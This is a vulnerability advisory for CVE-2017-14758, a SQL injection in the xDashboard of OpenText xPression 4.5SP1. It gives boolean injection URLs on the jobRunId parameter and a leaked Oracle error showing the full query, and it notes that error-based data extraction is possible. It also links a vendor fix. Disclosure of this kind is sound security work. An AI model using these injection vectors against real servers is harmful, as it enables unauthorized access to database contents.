OpenText Document Sciences xPression version 4.5SP1 Patch 13 suffers from a remote SQL injection vulnerability in the xDashboard functionality.
68bba5c75fbe035e1c156af28421746f
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
Additionally:
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
Results in the following error in response:
HTTP/1.1 200 OK
[...]
<b>Errors: </b>
See nested exception; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended
An attacker can see whole query and injection point. This can also be
used for error-based data extraction.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl